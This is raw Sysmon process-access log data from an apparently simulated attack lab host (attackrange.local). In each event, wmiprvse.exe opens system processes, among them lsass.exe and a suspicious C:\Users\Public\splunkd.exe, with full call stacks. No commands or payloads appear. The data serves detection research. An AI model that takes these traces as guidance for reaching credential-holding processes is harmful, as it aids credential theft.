15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024525Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024524Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024523Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024522Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024521Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024520Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024519Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024518Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024517Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024516Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024515Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024514Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024513Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024512Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024511Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024510Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024509Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024508Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024507Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535B-6008-4C06-00000000A301}5212C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024506Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 